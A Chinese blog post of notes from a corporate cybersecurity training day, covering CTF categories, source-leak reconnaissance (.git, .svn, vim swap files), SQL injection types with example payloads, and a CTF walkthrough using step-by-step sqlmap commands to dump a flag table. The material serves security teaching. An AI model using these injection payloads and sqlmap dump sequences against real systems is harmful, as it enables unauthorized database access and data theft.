<!DOCTYPE html>


<html lang="zh-CN">


<head>
  <meta charset="utf-8" />
   
  <meta name="keywords" content="生活,代码,学习" />
   
  <meta name="description" content="用于学习记录学习笔记" />
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
  <title>
    2021省公司网络安全培训-第一天 |  用于学习记录学习笔记
  </title>
  <meta name="generator" content="hexo-theme-ayer">
  
  <link rel="shortcut icon" href="/m.ico" />
  
  
<link rel="stylesheet" href="/dist/main.css">

  
<link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/css/remixicon.min.css">

  
<link rel="stylesheet" href="/css/custom.css">

  
  
<script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>

  
  

  

<link rel="alternate" href="/atom.xml" title="WYC's Blog" type="application/atom+xml">
</head>

</html>

<body>
  <div id="app">
    
      
    <main class="content on">
      <section class="outer">
  <article
  id="post-2021省公司网络安全培训（一）"
  class="article article-type-post"
  itemscope
  itemprop="blogPost"
  data-scroll-reveal
>
  <div class="article-inner">
    
    <header class="article-header">
       
<h1 class="article-title sea-center" style="border-left:0" itemprop="name">
  2021省公司网络安全培训-第一天
</h1>
 

    </header>
     
    <div class="article-meta">
      <a href="/2021/03/09/2021%E7%9C%81%E5%85%AC%E5%8F%B8%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%9F%B9%E8%AE%AD%EF%BC%88%E4%B8%80%EF%BC%89/" class="article-date">
  <time datetime="2021-03-09T01:32:00.000Z" itemprop="datePublished">2021-03-09</time>
</a> 
  <div class="article-category">
    <a class="article-category-link" href="/categories/%E5%9F%B9%E8%AE%AD/">培训</a>
  </div>
  
<div class="word_count">
    <span class="post-time">
        <span class="post-meta-item-icon">
            <i class="ri-quill-pen-line"></i>
            <span class="post-meta-item-text"> 字数统计:</span>
            <span class="post-count">4.2k</span>
        </span>
    </span>

    <span class="post-time">
        &nbsp; | &nbsp;
        <span class="post-meta-item-icon">
            <i class="ri-book-open-line"></i>
            <span class="post-meta-item-text"> 阅读时长≈</span>
            <span class="post-count">15 分钟</span>
        </span>
    </span>
</div>
 
    </div>
      
    <div class="tocbot"></div>




  
    <div class="article-entry" itemprop="articleBody">
       
  <h2 id="一、-环境配置"><a href="#一、-环境配置" class="headerlink" title="一、  环境配置"></a>一、  环境配置</h2><h3 id="a-Python环境配置"><a href="#a-Python环境配置" class="headerlink" title="a)  Python环境配置"></a>a)  Python环境配置</h3><h3 id="b-Java环境配置（可选，工具里面自带）"><a href="#b-Java环境配置（可选，工具里面自带）" class="headerlink" title="b)  Java环境配置（可选，工具里面自带）"></a>b)  Java环境配置（可选，工具里面自带）</h3><h3 id="c"><a href="#c" class="headerlink" title="c)"></a>c)</h3><h2 id="二、-CTF介绍"><a href="#二、-CTF介绍" class="headerlink" title="二、  CTF介绍"></a>二、  CTF介绍</h2><h3 id="a-CTF："><a href="#a-CTF：" class="headerlink" title="a)  CTF："></a>a)  CTF：</h3><p>夺旗（英语：Capture the flag，CTF）是一种西方传统运动。此游戏进行方式是由两队人马互相前往对方的基地夺旗，每队人马必须把敌方的旗从敌方的基地带回自己队伍的基地。后来，“夺旗”的概念也被引入信息安全攻防比赛。因为在比赛中，选手需要通过解开题目，或攻破目标夺得“Flag”。 在1996 年 DEFCON 全球黑客大会首次举办CTF比赛，是网络安全爱好者之间的竞技游戏。CTF 竞赛涉及众多领域，内容繁杂</p>
<h3 id="b-分类"><a href="#b-分类" class="headerlink" title="b)  分类"></a>b)  分类</h3><p><strong>1.</strong>     <strong>WEB：</strong></p>
<p>在 CTF 竞赛中，WEB 也是占比重很大的一个方向之一，WEB 类的题目种类繁多，知识点细碎，时效性强，能紧跟时下热点漏洞，贴近实战。WEB 类的题目包括但不限于：SQL 注入、XSS 跨站脚本、CSRF 跨站请求伪造、文件上传、文件包含、框架安全、PHP 常见漏洞、代码审计等。</p>
<p><strong>2.</strong>     <strong>Reverse：</strong></p>
<p>软件代码逆向主要指对软件的结流程，算法，代码等进行逆向拆解和分析。主要应用于软件维护，软件破解，漏洞挖掘，恶意代码分析。涉及 Windows、Linux、Android 平台的多种编程技术，要求利用常用工具对源代码及二进制文件进行逆向分析，掌握 Android 移动应用 APK 文件的逆向分析，掌握加解密、内核编程、算法、反调试和代码混淆技术。</p>
<p><strong>3.</strong>     <strong>Crypto：</strong></p>
<p>密码学（Cryptography）一般可分为古典密码学和现代密码学。其中，古典密码学，作为一种实用性艺术存在，其编码和破译通常依赖于设计者和敌手的创造力与技巧，并没有对密码学原件进行清晰的定义。而现代密码学则起源于 20 世纪中后期出现的大量相关理论，1949 年香农（C. E. Shannon）发表了题为《保密系统的通信理论》的经典论文标志着现代密码学的开始。</p>
<p><strong>4.</strong>     <strong>Pwn：</strong></p>
<p>pwn，在安全领域中指的是通过二进制/系统调用等方式获得目标主机的shell。主要手段有缓冲区溢出、格式化字符串溢出、栈溢出、堆溢出等漏洞，通过对以上漏洞利用而达到获取系统的权限。</p>
<p><strong>5.</strong>     <strong>Msic：</strong></p>
<p>Misc（Miscellaneous），即杂项，一般指CTF中无法分类在Web、PWN、Crypto、Reverse中的题目。当然，少数CTF比赛也存在额外分类，但Misc是一个各种各样的形式题目的大杂烩。</p>
<h3 id="c-信息收集"><a href="#c-信息收集" class="headerlink" title="c)  信息收集"></a>c)  信息收集</h3><p>在现实世界和比赛中，信息搜集是前期的必备工作，也是重中之重。在CTF线上比赛的Web类题目中，信息搜集涵盖的面非常广，有备份文件、目录信息、Banner信息等，这就需要参赛者有丰富的经验，或者利用一些脚本来帮助自己发现题目信息、挖掘题目漏洞。本节会尽可能叙述在CTF线上比赛中Web类题目包含的信息搜集，也会推荐一些开源工具软件。因为信息搜集大部分是工具的使用（git泄露可能涉及git命令的应用），所以本章可能不会有太多的技术细节。同时，因为信息搜集的种类比较多，本节会尽可能地涵盖，如有不足之处还望理解；最后会通过实际例子来体现信息搜集的重要性。</p>
<p><strong>1.</strong>     <strong>敏感目录泄露</strong></p>
<p>​             <strong>i.</strong>  <strong>Git泄露：git是一个主流的分布式版本控制系统，开发人员在开发过程中经常会遗忘.git文件夹，导致攻击者可以通过.git文件夹中的信息获取开发人员提交过的所有源码，进而可能导致服务器被攻击而沦陷。</strong></p>
<p>​             <strong>ii.</strong>  <strong>SVN泄露：SVN（subversion）是源代码版本管理软件，造成SVN源代码漏洞的主要原因是管理员操作不规范将SVN隐藏文件夹暴露于外网环境，可以利用.svn/entries或wc.db文件获取服务器源码等信息。</strong></p>
<p>​            <strong>iii.</strong>  <strong>HG泄露：在使用HG作为代码编辑和管理工具时，在初始化项目时，HG会在当前文件夹下创建一个.hg隐藏文件夹，其中包含代码和分支修改记录等信息。</strong></p>
<p><strong>总结：不论是.git这些隐藏文件，还是实战中的admin之类的敏感后台文件夹，其关键在于字典的强大，读者可以在某些工具的基础上进行二次开发，以满足自己需要。这里推荐一个开源的目录扫描工具：<a href="https://github.com/maurosoria/dirsearch。CTF线上比赛往往会有重定向一类问题。例如，只要访问.git，便会返回403，此时试探着访问.git/config，如果有文件内容返回，就说明存在git泄露，反之，一般不存在。而在SVN泄露中，一般是在entries中爬取源代码，但有时会出现entries为空的情况，这时注意wc.db文件存在与否，便可通过其中的checksum在pristine文件夹中获取源代码" target="_blank" rel="noopener">https://github.com/maurosoria/dirsearch。CTF线上比赛往往会有重定向一类问题。例如，只要访问.git，便会返回403，此时试探着访问.git/config，如果有文件内容返回，就说明存在git泄露，反之，一般不存在。而在SVN泄露中，一般是在entries中爬取源代码，但有时会出现entries为空的情况，这时注意wc.db文件存在与否，便可通过其中的checksum在pristine文件夹中获取源代码</a></strong></p>
<p><strong>2.</strong>     <strong>敏感备份文件泄露</strong></p>
<p>​             <strong>i.</strong>  <strong>gedit备份文件：在Linux下，用gedit编辑器保存后，当前目录下会生成一个后缀为“～”的文件，其文件内容就是刚编辑的内容。假设刚才保存的文件名为flag，则该文件名为flag～。通过浏览器访问这个带有“～”的文件，便可以得到源代码。</strong></p>
<p>​             <strong>ii.</strong>  <strong>Vim备份文件：vim是目前运用得最多的Linux编辑器，当用户在编辑文件但意外退出时（如通过SSH连接到服务器时，在用vim编辑文件的过程中可能遇到因为网速不够导致的命令行卡死而意外退出的情况），会在当前目录下生成一个备份文件，该文件用来备份缓冲区中的内容即退出时的文件内容，针对SWP备份文件，我们可以用“vim-r”命令恢复文件的内容。</strong></p>
<p>​            <strong>iii.</strong>  <strong>常规文件：常规文件所依靠的无非就是字典的饱和性，不论是CTF比赛中还是现实世界中，我们都会碰到一些经典的有辨识的文件，从而让我们更好地了解网站。<br> 以下为一些简单的例子：<br> robots.txt：         记录一些目录和CMS版本信息。<br> readme.md：        记录CMS版本信息，有的甚至有Github地址。<br> <a href="http://www.zip/rar/tar.gz：" target="_blank" rel="noopener">www.zip/rar/tar.gz：</a> 往往是网站的源码备份</strong></p>
<p><strong>总结：在CTF线上比赛的过程中，有时候备份文件为题目的提示，有些时候出题人往往会在线运维题目，有时会因为各种情况导致SWP备份文件的生成，所以在比赛过程中可以编写实时监控脚本，对题目服务进行监控。vim在第一次意外退出时生成的备份文件为*.swp，第二次意外退出时的为*.swo，第三次退出时的为*.swn，以此类推。vim的官方手册中还有*.un.文件名.swp类型的备份文件。另外，在实际环境中，网站的备份往往可能是网站域名的压缩</strong></p>
<p><strong>3.</strong>     <strong>Banner识别</strong></p>
<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210311194020.jpeg" alt=""></p>
<p><strong>4.</strong>     <strong>SQL注入</strong></p>
<p>SQL注入是开发者对用户输入的参数过滤不严格，导致用户输入的数据能够影响预设查询功能的一种技术，通常将导致数据库的原有信息泄露、篡改，甚至被删除。本节用一些简单的例子详细介绍SQL注入的基础，包括数字型注入、UNION注入、字符型注入、布尔盲注、时间注入、报错注入和堆叠注入等注入方式和对应的利用技巧。</p>
<p>​             <strong>i.</strong>  <strong>数字型注入和UNION注入：</strong></p>
<p>通过网页访问链接<a href="http://192.168.20.133/sql1.php" target="_blank" rel="noopener">http://192.168.20.133/sql1.php</a>？id=1，结果见图。页面显示的内容与表中的第一行id为1的结果一致。事实上，PHP将GET方法传入的id=1与前面的SQL查询语句进行了拼接。原查询语句如下：</p>
<p>$res = mysqli_querry($conn, “SELECT title , content, FROM wp_news WHERE id “.$_GET[‘id’]); </p>
<p>收到请求<a href="http://192.168.20.133/sql1.php？id=1的$_GET[&#39;id&#39;]被赋值为1，最后传给MySQL的查询语句如下：" target="_blank" rel="noopener">http://192.168.20.133/sql1.php？id=1的$_GET[&#39;id&#39;]被赋值为1，最后传给MySQL的查询语句如下：</a></p>
<p>SELECT title，content, FROM wp_news WHERE id = 1</p>
<p>我们直接在MySQL中查询也能得到相同的结果，现在互联网上绝大多数网站的内容是预先存储在数据库中，通过用户传入的id等参数，从数据库的数据中查询对应记录，再显示在浏览器中，如<a href="http://berkeleyrecycling.org/page.php?id=1中的“1’" target="_blank" rel="noopener">http://berkeleyrecycling.org/page.php?id=1中的“1’</a></p>
<p>通常把使用UNION语句将数据展示到页面上的注入办法称为UNION（联合查询）注入。</p>
<p>MySQL 5.0版本后，默认自带一个数据库information_schema，MySQL的所有数据库名、表名、字段名都可以从中查询到。虽然引入这个库是为了方便数据库信息的查询，但客观上大大方便了SQL注入的利用。</p>
<p>table_name字段是information_schema库的tables表的表名字段。表中还有数据库名字段table_schema。而database()函数返回的内容是当前数据库的名称，group_concat是用“，”联合多行记录的函数。也就是说，该语句可以联合查询当前库的所有（事实上有一定的长度限制）表名并显示在一个字段中。</p>
<p>数字型注入的关键在于找到输入的参数点，然后通过加、减、乘除等运算，判断出输入参数附近没有引号包裹，再通过一些通用的攻击手段，获取数据库的敏感信息。</p>
<p>​             <strong>ii.</strong>  <strong>字符型注入和布尔盲注</strong></p>
<p>在MySQL中，等号两边如果类型不一致，则会发生强制转换。当数字与字符串数据比较时，字符串将被转换为数字，再进行比较。按照这个特性，我们容易判断输入点是否为字符型，也就是是否有引号（可能是单引号也可能是双引号，绝大多数情况下是单引号）包裹。</p>
<p>关键字WHERE是SELECT操作的一个判断条件，之前的id=1即查询条件。这里，AND代表需要同时满足两个条件，一个是id=1，另一个是‘1’。由于字符串‘1’被强制转换成True，代表这个条件成立，因此数据库查询出id=1的记录。虽然我们看不到直接的数据，但是可以通过注入推测出数据，这种技术被称为布尔盲注。那么，这种情况下如何获得数据呢？我们可以猜测数据。例如，先试探这个数据是否为’a’，如果是，则页面显示id=1的回显，否则页面显示空白；再试探这个数据是否为’b’，如果数据只有1位，那么只要把可见字符都试一遍就能猜到。假设被猜测的字符是’f’，访问<a href="http://192.168.20.133/sql2.php？id=1&#39;and&#39;f&#39;=&#39;a&#39;，猜测为&#39;a&#39;，没有猜中，于是尝试&#39;b&#39;、&#39;c&#39;、&#39;d&#39;、&#39;e&#39;，都没有猜中，直到尝试&#39;f&#39;的时候，猜中了，于是页面回显了id=1的内容" target="_blank" rel="noopener">http://192.168.20.133/sql2.php？id=1&#39;and&#39;f&#39;=&#39;a&#39;，猜测为&#39;a&#39;，没有猜中，于是尝试&#39;b&#39;、&#39;c&#39;、&#39;d&#39;、&#39;e&#39;，都没有猜中，直到尝试&#39;f&#39;的时候，猜中了，于是页面回显了id=1的内容</a></p>
<p>在盲注过程中，根据页面回显的不同来判断布尔盲注比较常见，除此之外，还有一类盲注方式。由于某些情况下，页面回显的内容完全一致，故需要借助其他手段对SQL注入的执行结果进行判断，如通过服务器执行SQL语句所需要的时间。在执行的语句中，由于sleep（1）的存在，使整个语句在执行时需要等待1秒，导致执行该查询需要至少1秒的时间。通过修改sleep()函数中的参数，我们可以延时更长，来保证是注入导致的延时，而不是业务正常处理导致的延时。与回显的盲注的直观结果不同，通过sleep()函数，利用IF条件函数或AND、OR函数的短路特性和SQL执行的时间判断SQL攻击的结果，这种注入的方式被称为时间盲注。其本质与布尔盲注类似，故具体利用方式不再赘述。</p>
<p>​            <strong>iii.</strong>  <strong>报错注入：</strong></p>
<p>有时为了方便开发者调试，有的网站会开启错误调试信息。此时，只要触发SQL语句的错误，即可在页面上看到错误信息。这种攻击方式则是因为MySQL会将语句执行后的报错信息输出，故称为报错注入。通过查阅相关文档可知，updatexml在执行时，第二个参数应该为合法的XPATH路径，否则会在引发报错的同时将传入的参数进行输出，利用这个特征，针对存在报错显示，将我们想得到的信息传入，就可以触发错误获取我们想要的数据。另外，当目标开启多语句执行的时候，可以采用多语句执行的方式修改数据库的任意结构和数据，这种特殊的注入情况被称为堆叠注入。</p>
<p>​            <strong>iv.</strong>  <strong>总结：</strong></p>
<p>本节讲述了数字型注入、UNION注入、布尔盲注、时间盲注、报错注入，这些是在后续注入中需要用到的基础。根据获取数据的便利性，这些注入技巧的使用优先级是：UNION注入&gt;报错注入&gt;布尔盲注&gt;时间盲注。</p>
<p>堆叠注入不在排序范围内，因为其通常需要结合其他技巧使用才能获取数据。</p>
<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210311194011.jpg" alt="img"></p>
<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210311194014.jpg" alt="img"></p>
<h2 id="三、-工具介绍"><a href="#三、-工具介绍" class="headerlink" title="三、  工具介绍"></a>三、  工具介绍</h2><h3 id="1-BurpSuite："><a href="#1-BurpSuite：" class="headerlink" title="1.  BurpSuite："></a>1.  BurpSuite：</h3><p>是用于攻击web 应用程序的集成平台，包含了许多工具。Burp Suite为这些工具设计了许多接口，以加快攻击应用程序的过程。所有工具都共享一个请求，并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。</p>
<h3 id="2-DirSearch：目录扫描工具"><a href="#2-DirSearch：目录扫描工具" class="headerlink" title="2.  DirSearch：目录扫描工具"></a>2.  DirSearch：目录扫描工具</h3><h3 id="3-Sqlmap：自动SQL注入工具"><a href="#3-Sqlmap：自动SQL注入工具" class="headerlink" title="3.  Sqlmap：自动SQL注入工具"></a>3.  Sqlmap：自动SQL注入工具</h3><h2 id="四、-上手实战"><a href="#四、-上手实战" class="headerlink" title="四、  上手实战"></a>四、  上手实战</h2><h3 id="1-SQL注入："><a href="#1-SQL注入：" class="headerlink" title="1.  SQL注入："></a>1.  SQL注入：</h3><p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210311194004.jpg" alt="img"></p>
<p>第一步：利用sqlmap自动注入工具寻找注入点和注入类型</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u &quot;http:&#x2F;&#x2F;139.186.146.65:20259&#x2F;index.php?id&#x3D;1&quot; --batch</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210311193959.jpg" alt="img"></p>
<p>发现注入点：参数id；类型有布尔盲注，时间盲注，联合注入方式</p>
<p>第二步：继续进行数据库扫描</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u &quot;http:&#x2F;&#x2F;139.186.146.65:20259&#x2F;index.php?id&#x3D;1&quot; –batch –dbs</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210311193951.jpg" alt="img"></p>
<p>发现有几个数据库，猜测当前系统数据库是“note”。</p>
<p>第三步：选择数据库note，进行数据表扫描</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u &quot;http:&#x2F;&#x2F;139.186.146.65:20259&#x2F;index.php?id&#x3D;1&quot; --batch -D note –tables</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210311193937.png" alt="image-20210311193937109"></p>
<p>扫描得到数据表有fl4g和notes，我们flag肯定就在fl4g里面。</p>
<p>第四步就是扫描数据表列数据</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u &quot;http:&#x2F;&#x2F;139.186.146.65:20259&#x2F;index.php?id&#x3D;1&quot; --batch -D note -T fl4g --columns</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210311193907.png" alt="image-20210311193906922"></p>
<p>得到列数据</p>
<p>最后一步扫描数据表内容</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u &quot;http:&#x2F;&#x2F;139.186.146.65:20259&#x2F;index.php?id&#x3D;1&quot; --batch -D note -T fl4g -C fllllag --dump</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210311193827.png" alt="image-20210311193827262"></p>
<p>得到flag =》 n1book{union_select_is_so_cool}</p>
<h3 id="2-SQL注入2："><a href="#2-SQL注入2：" class="headerlink" title="2.  SQL注入2："></a>2.  SQL注入2：</h3><p>Post表单提交方式的登录，将登录请求数据抓取并导出到文本文件，然后使用sqlmap工具扫描注入点</p>
<p>Sqlmap.py -r “导出的请求数据文件” –batch</p>
<p>得到有注入点信息及注入类型，说明可以进行sql注入，接下来进行数据库扫描</p>
<p>Sqlmap.py -r “导出的请求数据文件” –batch –dbs</p>
<p>得到数据库，猜测一个数据库进行扫描</p>
<p>Sqlmap.py -r “导出的请求数据文件” –batch –D 猜测的数据库 –tables</p>
<p>得到该数据库的数据表，选择一个数据表扫描其列字段</p>
<p>Sqlmap.py -r “导出的请求数据文件” –batch –D 猜测的数据库 –T 猜测的数据表 –columns</p>
<p>最后选择列字段进行数据扫描，最终得到结果</p>
<p>Sqlmap.py -r “导出的请求数据文件” –batch –D 猜测的数据库 –T 猜测的数据表 –C 猜测的数据列名 –dump</p>
<h2 id="练习地："><a href="#练习地：" class="headerlink" title="练习地："></a>练习地：</h2><h3 id="https-buuoj-cn"><a href="#https-buuoj-cn" class="headerlink" title="https://buuoj.cn/"></a><a href="https://buuoj.cn/" target="_blank" rel="noopener">https://buuoj.cn/</a></h3><h3 id="https-www-ctfhub-com-index"><a href="#https-www-ctfhub-com-index" class="headerlink" title="https://www.ctfhub.com/#/index"></a><a href="https://www.ctfhub.com/#/index" target="_blank" rel="noopener">https://www.ctfhub.com/#/index</a></h3><h3 id="https-wiki-x10sec-org"><a href="#https-wiki-x10sec-org" class="headerlink" title="https://wiki.x10sec.org/"></a><a href="https://wiki.x10sec.org/" target="_blank" rel="noopener">https://wiki.x10sec.org/</a></h3><h2 id=""><a href="#" class="headerlink" title=""></a></h2> 
      <!-- reward -->
      
      <div id="reword-out">
        <div id="reward-btn">
          打赏
        </div>
      </div>
      
    </div>
    

    <!-- copyright -->
    
    <div class="declare">
      <ul class="post-copyright">
        <li>
          <i class="ri-copyright-line"></i>
          <strong>版权声明： </strong>
          本博客所有文章除特别声明外，著作权归作者所有。转载请注明出处！
        </li>
      </ul>
    </div>
    
    <footer class="article-footer">
       
<div class="share-btn">
      <span class="share-sns share-outer">
        <i class="ri-share-forward-line"></i>
        分享
      </span>
      <div class="share-wrap">
        <i class="arrow"></i>
        <div class="share-icons">
          
          <a class="weibo share-sns" href="javascript:;" data-type="weibo">
            <i class="ri-weibo-fill"></i>
          </a>
          <a class="weixin share-sns wxFab" href="javascript:;" data-type="weixin">
            <i class="ri-wechat-fill"></i>
          </a>
          <a class="qq share-sns" href="javascript:;" data-type="qq">
            <i class="ri-qq-fill"></i>
          </a>
          <a class="douban share-sns" href="javascript:;" data-type="douban">
            <i class="ri-douban-line"></i>
          </a>
          <!-- <a class="qzone share-sns" href="javascript:;" data-type="qzone">
            <i class="icon icon-qzone"></i>
          </a> -->
          
          <a class="facebook share-sns" href="javascript:;" data-type="facebook">
            <i class="ri-facebook-circle-fill"></i>
          </a>
          <a class="twitter share-sns" href="javascript:;" data-type="twitter">
            <i class="ri-twitter-fill"></i>
          </a>
          <a class="google share-sns" href="javascript:;" data-type="google">
            <i class="ri-google-fill"></i>
          </a>
        </div>
      </div>
</div>

<div class="wx-share-modal">
    <a class="modal-close" href="javascript:;"><i class="ri-close-circle-line"></i></a>
    <p>扫一扫，分享到微信</p>
    <div class="wx-qrcode">
      <img src="//api.qrserver.com/v1/create-qr-code/?size=150x150&data=https://wycisme.gitee.io/2021/03/09/2021%E7%9C%81%E5%85%AC%E5%8F%B8%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%9F%B9%E8%AE%AD%EF%BC%88%E4%B8%80%EF%BC%89/" alt="微信分享二维码">
    </div>
</div>

<div id="share-mask"></div>  
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E5%AE%89%E5%85%A8/" rel="tag">安全</a></li></ul>

    </footer>
  </div>

   
  <nav class="article-nav">
    
      <a href="/2021/03/10/2021%E7%9C%81%E5%85%AC%E5%8F%B8%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%9F%B9%E8%AE%AD%EF%BC%88%E4%BA%8C%EF%BC%89/" class="article-nav-link">
        <strong class="article-nav-caption">上一篇</strong>
        <div class="article-nav-title">
          
            2021省公司网络安全培训-第二天
          
        </div>
      </a>
    
    
      <a href="/2020/09/02/CentOS%E9%98%B2%E7%81%AB%E5%A2%99%E5%B8%B8%E7%94%A8%E6%93%8D%E4%BD%9C/" class="article-nav-link">
        <strong class="article-nav-caption">下一篇</strong>
        <div class="article-nav-title">CentOS防火墙常用操作</div>
      </a>
    
  </nav>

   
<!-- valine评论 -->
<div id="vcomments-box">
  <div id="vcomments"></div>
</div>
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/valine@1.4.14/dist/Valine.min.js"></script>
<script>
  new Valine({
    el: "#vcomments",
    app_id: "",
    app_key: "",
    path: window.location.pathname,
    avatar: "monsterid",
    placeholder: "给我的文章加点评论吧~",
    recordIP: true,
  });
  const infoEle = document.querySelector("#vcomments .info");
  if (infoEle && infoEle.childNodes && infoEle.childNodes.length > 0) {
    infoEle.childNodes.forEach(function (item) {
      item.parentNode.removeChild(item);
    });
  }
</script>
<style>
  #vcomments-box {
    padding: 5px 30px;
  }

  @media screen and (max-width: 800px) {
    #vcomments-box {
      padding: 5px 0px;
    }
  }

  #vcomments-box #vcomments {
    background-color: #fff;
  }

  .v .vlist .vcard .vh {
    padding-right: 20px;
  }

  .v .vlist .vcard {
    padding-left: 10px;
  }
</style>

 
     
</article>

</section>
      <footer class="footer">
  <div class="outer">
    <ul>
      <li>
        Copyrights &copy;
        2015-2021
        <i class="ri-heart-fill heart_icon"></i> 文一冲
      </li>
    </ul>
    <ul>
      <li>
        
        
        
        由 <a href="https://hexo.io" target="_blank">Hexo</a> 强力驱动
        <span class="division">|</span>
        主题 - <a href="https://github.com/Shen-Yu/hexo-theme-ayer" target="_blank">Ayer</a>
        
      </li>
    </ul>
    <ul>
      <li>
        
        
        <span>
  <span><i class="ri-user-3-fill"></i>访问人数:<span id="busuanzi_value_site_uv"></span></s>
  <span class="division">|</span>
  <span><i class="ri-eye-fill"></i>浏览次数:<span id="busuanzi_value_page_pv"></span></span>
</span>
        
      </li>
    </ul>
    <ul>
      
    </ul>
    <ul>
      <li>
        <!-- cnzz统计 -->
        
        <script type="text/javascript" src='https://s9.cnzz.com/z_stat.php?id=1278069914&amp;web_id=1278069914'></script>
        
      </li>
    </ul>
  </div>
</footer>
      <div class="float_btns">
        <div class="totop" id="totop">
  <i class="ri-arrow-up-line"></i>
</div>

<div class="todark" id="todark">
  <i class="ri-moon-line"></i>
</div>

      </div>
    </main>
    <aside class="sidebar on">
      <button class="navbar-toggle"></button>
<nav class="navbar">
  
  <div class="logo">
    <a href="/"><img src="/m.ico" alt="WYC&#39;s Blog"></a>
  </div>
  
  <ul class="nav nav-main">
    
    <li class="nav-item">
      <a class="nav-item-link" href="/">主页</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/archives">归档</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/categories">分类</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/tags">标签</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/about">关于我</a>
    </li>
    
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      
      <a class="nav-item-link nav-item-search"  title="搜索">
        <i class="ri-search-line"></i>
      </a>
      
      
      <a class="nav-item-link" target="_blank" href="/atom.xml" title="RSS Feed">
        <i class="ri-rss-line"></i>
      </a>
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
    </aside>
    <script>
      if (window.matchMedia("(max-width: 768px)").matches) {
        document.querySelector('.content').classList.remove('on');
        document.querySelector('.sidebar').classList.remove('on');
      }
    </script>
    <div id="mask"></div>

<!-- #reward -->
<div id="reward">
  <span class="close"><i class="ri-close-line"></i></span>
  <p class="reward-p"><i class="ri-cup-line"></i>请我喝杯咖啡吧~</p>
  <div class="reward-box">
    
    <div class="reward-item">
      <img class="reward-img" src="/images/alipay.jpg">
      <span class="reward-type">支付宝</span>
    </div>
    
    
    <div class="reward-item">
      <img class="reward-img" src="/images/wechat.jpg">
      <span class="reward-type">微信</span>
    </div>
    
  </div>
</div>
    
<script src="/js/jquery-2.0.3.min.js"></script>


<script src="/js/lazyload.min.js"></script>

<!-- Tocbot -->


<script src="/js/tocbot.min.js"></script>

<script>
  tocbot.init({
    tocSelector: '.tocbot',
    contentSelector: '.article-entry',
    headingSelector: 'h1, h2, h3, h4, h5, h6',
    hasInnerContainers: true,
    scrollSmooth: true,
    scrollContainer: 'main',
    positionFixedSelector: '.tocbot',
    positionFixedClass: 'is-position-fixed',
    fixedSidebarOffset: 'auto'
  });
</script>

<script src="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.js"></script>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.css">
<script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js"></script>

<script src="/dist/main.js"></script>

<!-- ImageViewer -->

<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                <!--  Controls are self-explanatory. Order can be changed. -->

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" style="display:none" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
